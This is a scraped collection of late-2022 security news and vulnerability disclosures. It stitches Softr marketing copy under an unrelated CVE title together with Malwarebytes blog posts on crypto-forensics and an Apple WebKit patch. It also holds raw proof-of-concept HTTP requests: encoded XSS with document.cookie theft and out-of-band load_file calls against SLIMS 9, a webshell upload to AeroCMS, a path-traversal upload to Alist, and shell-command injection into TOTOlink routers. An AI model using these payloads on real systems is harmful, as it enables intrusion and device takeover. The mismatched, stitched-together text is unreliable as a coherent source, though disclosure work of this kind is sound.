Softr v2.0 was discovered to be vulnerable to HTML injection via the Name field of the Account page.

**Build custom apps for your business, as easy as lego**

|

Turn your Airtable or Google Sheets into client portals, partner apps or internal tools.

**Trusted by 80,000+ teams worldwide**

**Create apps powered by your data**

**Client Portals**

Create client or employee portals with self-service account creation and secure access to content.

**Internal Tools**

Enable your team to create internal apps like employee directories, CRM, and company wikis, in minutes.

**Marketplaces**

Create two sided marketplaces like Airbnb, Upwork and the like. Sell services, goods, pay securely with Stripe and run your entire business from one tool.

**Online Communities**

Supercharge your community and bring them together in one platform, with memberships, free and premium content. Share resources, sell courses, connect with each other and more.

**Resource Directories**

Curate resources of any kind and let users search, filter, and explore. Launch online courses, company wikis or upvoting sites directly from Airtable.

**Websites**

Quickly create multi-page marketing sites or high-converting landing pages. Add your custom domain for free.

**Softr is the easiest, fastest way to build a professional web app on Airtable. Zero learning curve.**

**80,000+ companies and creators use Softr**

I had already tried other tools, so when I started using Softr, it was clear immediately that the capabilities were beyond what I found elsewhere.

**Yohei Nakajima**

General Partner, Untapped Capital

Softr helps you take action on your ideas quickly by allowing you to leverage your Airtable data and build powerful websites and web apps. I was blown away by how user-friendly and well-documented the entire product was! I was able to create an app within hours without any external help.

**Karthik Puvvada (KP)**

Program Director, On Deck No-Code Fellowship

Softr’s ease and speed of use is it’s standout characteristic. No tool is faster to create with. Although there is limited design customizability, this should be viewed as a strength of Softr as it acts as a positive restraint to help you ship things more quickly than you ordinarily would.

**Max Haining**

Founder, 100DaysOfNoCode

They say that if you can’t explain it in a simple way, you don’t understand it well enough. I say the same thing about any software. If you can’t figure it out in the first 10 min by yourself without any tutorial, it’s probably not for you. Since the first moment we discovered Softr, we started the work.

**Akiki Rachid**

COO, Bookzdoctr Inc

It took me one day to build the product, learn the integrations, and see how the customer service acts. I was completely flashed that it is so easy, and that everything is working really well. So, I quickly decided 3 weeks later to set up our main page and transferred it to Softr.

**Sabine Wildemann**

Co-Founder, KidsCircle

I have been impressed with the flexibility of Softr. The ability to pull data from different Airtable bases into different blocks and display them on one page was one of the main reasons I chose Softr.

**Dan Smith**

Director, DS Automotive

As a small business, we needed to use a tool that could grow with us, and we feel that this is what Softr offers us. After wasting time and money trying every web builder under the sun, Softr came to save the day. We cannot recommend this platform enough – it's perfect, easy to use even for a non-technical person like me.

**Lucia Borraccino**

Founder, Nanny Network

I like the diversity of templates that are available and the thoughtfulness that has been taken in making the building process as simple as possible for non-coders.

**Kwaku Dapaah-Danquah**

Entrepreneurship Manager, YSYS

I used Softr to build the MVP for my company www.tallsize.com.When I discovered how easy it was to use Softr to create a frontend interface for our users, my mind was blown!!! It was so easy to set up that I literally launched my site in a single weekend. Their support team was incredible throughout this journey and the ability to customize everything the way I wanted was very intuitive and easy to accomplish.

**Nicole Murphy**

Founder, Tall Size

I have been using Softr for a few months now, and the list of new features & improvements is PHENOMENAL. A no-brainer pick for now and a really good bet for the future!

**Nic Touron**

Founder, ToolMeUp

With Softr, I’m able to create beautifully intuitive and responsive front-ends that integrate directly with Airtable and Stripe. Softr allows me to create and iterate at least twice as fast as traditional web platforms.

**Connor Gustafson**

Founder, LendingApp

Softr is THE no-code website builder to use. From SEO and site responsiveness to database backends and customer support, Softr is the deal of the century!

**Patrick Ford**

Founder, Adastacks

**Simple, yet powerful**

**As simple as building lego**

Start from a template or from 100+ pre-built blocks and customize any element on the page. No design or coding skills needed.

**Build platforms, not just sites**

Turn your Airtable data into a full-stack web-app with out-of-the-box memberships, payments and business logic, all in one place.

**Turn into a mobile app, with one click**

Immediately made available on both Apple and Android devices, without the extra effort.

**Start now, go live today**

Don't spend hours learning new tools. Softr is the quickest way to put a product in the hands of your customers. Changing things later is easy and instant.

**This website is built on Softr**

Join 80,000+ companies already using Softr.

**Powerful pre-built functionality out of the box**

Softr does the heavy lifting of all technical work for you, so you can focus on your business.

**Secure user accounts**

Keep yours and your customers' data safe with server-side password protection.

**Free custom domain**

Our free tier includes hosting on custom domains. No credit card required.

**Team Collaboration**

Invite your teammates to manage the application and set granular permissions

**Easy online payments**

Enable one-off purchases or subscriptions in seconds.

**Optimized for SEO**

Pages built with Softr are automatically indexed by search engines.

**Performant, safe, and scalable**

Enjoy Amazon AWS-powered security and performance.

**Integrate with the tools you love**

Seamlessly integrate your Softr app with the modern and trusted tools of your workflow like Zapier, Google Analytics, Stripe, Hotjar, Mailchimp and more.

**Run your business on Softr + Airtable**

**For Companies**

Explore how SMBs and startups use Softr to manage and grow their business.

LEARN MORE

**For Creators**

Learn how entrepreneurs of all sizes are starting new ventures in days with Softr.

LEARN MORE

**For Non-Profits**

Organizations of all kinds can run their operations online, saving time and money.

**Learn about companies and creators using Softr**

CVE-2022-40434: Build website, web app & portals on Airtable without code | Softr

Senayan Library Management System version 9.2.0 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.19.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.0/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%62%62%62%62%27%2b%28%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%5c%5c%5c%5c%37%31%36%67%62%31%63%66%65%39%67%6b%6a%61%34%7a%64%6a%34%35%71%78%78%39%32%30%38%76%77%6c%6b%63%6e%30%65%6e%36%62%76%2e%73%6c%69%6d%73%2e%77%65%62%2e%69%64%5c%5c%6e%62%71%27%29%29%2b%27%74%38%78%71%76%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%67%69%70%68%79%2e%63%6f%6d%2f%6d%65%64%69%61%2f%62%54%42%79%75%74%61%6d%4a%53%6a%68%53%2f%67%69%70%68%79%2e%67%69%66%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e%3c%2f%73%63%72%69%70%74%3e%75%6f%75%32%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=i6ml8c8i4dmi37vtcpnnf9jhm9; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0)## Proof and Exploit:[href](https://streamable.com/5smxxm)## Time spent`02:35:00`

Senayan Library Management System 9.2.0 Cross Site Scripting

Senayan Library Management System version 9.1.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image## Author: nu11secur1ty## Date: 12.17.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1## Description:The value of the `class` request parameter is copied into the HTMLdocument as plain text between tags.The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in theclass parameter. This input was echoed unmodified in the application'sresponse.The attacker can trick some authenticated user to visit his page andgive to him very sensitive information about the system.## STATUS: HIGH Vulnerability[+] Payloads:0.0```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```0.1```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)## Proof and Exploit:[href](https://streamable.com/ibdulr)## Time spent`01:30:00`

Senayan Library Management System 9.1.1 Cross Site Scripting

Categories: Podcast
This week on Lock and Code, we learn about how investigators actually track illicit cryptocurrency payments through cyberspace after they've already been exchanged as part of a crime. 



(Read more...)




The post Chasing cryptocurrency through cyberspace, with Brian Carter: Lock and Code S03E26 appeared first on Malwarebytes Labs.

Posted: December 19, 2022 by

On June 7, 2021, the US Department of Justice announced a breakthrough: Less than one month after the oil and gas pipeline company Colonial Pipeline had paid its ransomware attackers roughly $4.4 million in bitcoin in exchange for a decryption key that would help the company get its systems back up and running, the government had in turn found where many of those bitcoins had gone, clawing back a remarkable $2.3 million from the cybercriminals.

In cybercrime, this isn't supposed to happen—or at least it wasn't, until recently. 

Cryptocurrency is vital to modern cybercrime. Every recent story you hear about a major ransomware attack involves the implicit demand from attackers to their victims for a payment made in cryptocurrency—and, almost always, the preferred cryptocurrency is bitcoin. In 2019, the ransomware negotiation and recovery company Coveware revealed that a full 98 percent of ransomware payments were made using bitcoin.

Why is that? Well, partly because, for years, bitcoin received an inflated reputation for being truly "anonymous," as payments to specific "bitcoin addresses" could not, seemingly, be attached to specific persons behind those addresses. But cryptocurrency has matured. Major cryptocurrency exchanges do not want their platforms to be used to exchange stolen funds into local currencies for criminals, so they, in turn, work with law enforcement agencies that have, independently, gained a great deal of experience in understanding cybercrime. Improving the rate and quality of investigations has also been the advancement of technology that actually tracks cryptocurrency payments online. 

All of these development don't necessarily mean that cybercriminals' identities can be easily revealed. But as Brian Carter, senior cybercrimes specialist for Chainalysis, explains on today's episode, it has become easier for investigators to know who is receiving payments, where they're moving it to, and even how their criminal organizations are set up.

> "We will plot a graph, like a link graph, that shows \[a victim's\] payment to the address provided by ransomware criminals, and then that payment will split among the members of the crew, and then those payments will end up going eventually to a place where it'll be cashed out for something that they can use on their local economy."

Tune in to today's Lock and Code podcast, with host David Ruiz, to learn about the world of cryptocurrency forensics, what investigators are looking for in reams of data, how they find it, and why it’s so hard. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

**RELATED ARTICLES**

Chasing cryptocurrency through cyberspace, with Brian Carter: Lock and Code S03E26

Categories: News
Tags: week in security

Tags:  AWIS

Tags:  weekly blog recap

Tags:  Indiana

Tags:  TikTok

Tags:  MSP

Tags:  electronic sales suppression tools

Tags:  iPhone

Tags:  Play ransomware

Tags:  ransomware

Tags:  Nebula

Tags:  Quarantine for Cloud Storage Scanning

Tags:  SOC

Tags:  ROI

Tags:  Uber

Tags:  Apple

Tags:  virtual kidnapping

Tags:  DDoS booter service

Tags:  law enforcement takedown

Tags:  InfraGuard

Tags:  InfraGuard breach

The most interesting security related news from the week of December 12 to 18.



(Read more...)




The post A week in security (December 12 - 18) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (December 12 - 18)

In AeroCms v0.0.1, there is an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.

*   Description

In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit\_post , through which we can upload webshell and control the web server.

*   Step to Reproduct

1.  Login to **admin panel** -> **Posts** -> **View All Posts** -> **Edit**  
    
2.  when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php  
    
3.  When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed  
    

*   Vulnerable Code

No file checking before uploading in **edit\_post.php** file  

*   POC

\`POST /AeroCMS/admin/posts.php?source=edit\_post&p\_id=3 HTTP/1.1  
Host: 192.168.111.169  
Content-Length: 991  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.111.169  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit\_post&p\_id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45  
Connection: close

\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_title"

mysql  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_category\_id"

1  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_user"

admin  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_status"

draft  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="image"; filename="phpinfo.php"  
Content-Type: application/octet-stream

\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_tags"

mysql, database  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_content"

AeroCMS is created with mysql database.

\------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="update\_post"

Edit Post  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO--  
\`

CVE-2022-46135: AeroCMS v0.0.1 Arbitrary File upload vulnerability  · Issue #5 · MegaTKC/AeroCMS

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  iOS 16.1.2

Tags:  Safari 16.2

Tags:  CVE-2022-42856

Tags:  type confusion

Apple has released new security content for iOS 16.1.2 and Safari 16.2. to fix a zero-day security vulnerability that was actively exploited



(Read more...)




The post Update now! Apple patches active exploit vulnerability for iPhones appeared first on Malwarebytes Labs.

Posted: December 16, 2022 by

Apple has released new security content for iOS 16.1.2 and Safari 16.2. Normally we would say that Apple pushed out updates, but in this mysterious case the advisory is about an iPhone software update Apple released two weeks ago. As it turns out, to fix a zero-day security vulnerability that was actively exploited.

**Mitigation**

The updates should all have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level.

How to update your iPhone or iPad.

How to update macOS on Mac.

If you fear your Mac has been infected, try out Malwarebytes for Mac. Or Malwarebytes for iOS for your Apple devices.

Since the vulnerability we’ll discuss below is already being exploited, it's important that you update your devices as soon as you can.

**CVE-2022-42856**

Apple revealed that it is aware that threat actors are actively exploiting the vulnerability listed as CVE-2022-42856. The bug was found in WebKit which is Apple’s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps. So, it’s no surprise that you will find the same CVE number in the Safari security advisory, along with a list of others.

Apple says the impact of the vulnerability is that processing maliciously crafted web content may lead to arbitrary code execution. The underlying issue was what is called a "type confusion" issue, which was addressed with improved state handling.

Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

Another clue was given when Apple revealed that security researchers at Google’s Threat Analysis Group, which investigates nation state-backed spyware, hacking, and cyberattacks, discovered and reported the WebKit bug. That might give you an idea about who was using the exploit in the wild.

**Version confusion**

What remains a mystery is why Apple specifically stated that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

We asked our resident Apple expert Thomas Reed why, then, did iOS 16 users get an update and iOS 15 users didn’t?

He pointed out the fact that Apple recently documented that security fixes may only apply to the latest system, and may not be back-ported to older systems. This has always been the case, but it wasn't documented, leaving users guessing about what was going on.

> “Still, Apple has been known to back-port fixes when they're aware of active attacks on an older system, so I doubt it's just a matter of falling back on a disclaimer. That suggests to me that there's some difficulty involved. I don't know exactly what changed in WebKit between iOS 15 and 16, but there were definitely a lot of Safari-related changes in iOS 16, so it's entirely possible there's some kind of architectural change standing in the way of back-porting.”

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Update now! Apple patches active exploit vulnerability for iPhones

Alist v3.4.0 is vulnerable to Directory Traversal,

**Please make sure of the following things**

*   I have read the documentation.
*   I'm sure there are no duplicate issues or discussions.
*   I'm sure it's due to alist and not something else(such as Dependencies or Operational).
*   I'm sure I'm using the latest version

**Alist Version / Alist 版本**

v3.4.0（It seems like this problem still exists in version 3.5.1）

**Driver used / 使用的存储驱动**

Local

**Describe the bug / 问题描述**

*   A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path
    
*   I created a user 'test' with file upload permission only and set its base path to '/test'
    

*   My file directory structure is as follows

*   Login as 'test', found out that I am already in '/test'

*   And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

*   Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

**Reproduction / 复现链接**

Package:  
PUT /api/fs/put HTTP/1.1  
Host: 192.168.31.148:52000  
Content-Length: 30530  
Accept: application/json, text/plain, _/_  
As-Task: false  
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg\_-rzQ7hf5tbbsy4RSVc  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**  
Content-Type: application/octet-stream  
Origin: http://192.168.31.148:52000  
Referer: http://192.168.31.148:52000/  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close

�PNG  
�

**Logs / 日志**

CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

Tag

#apple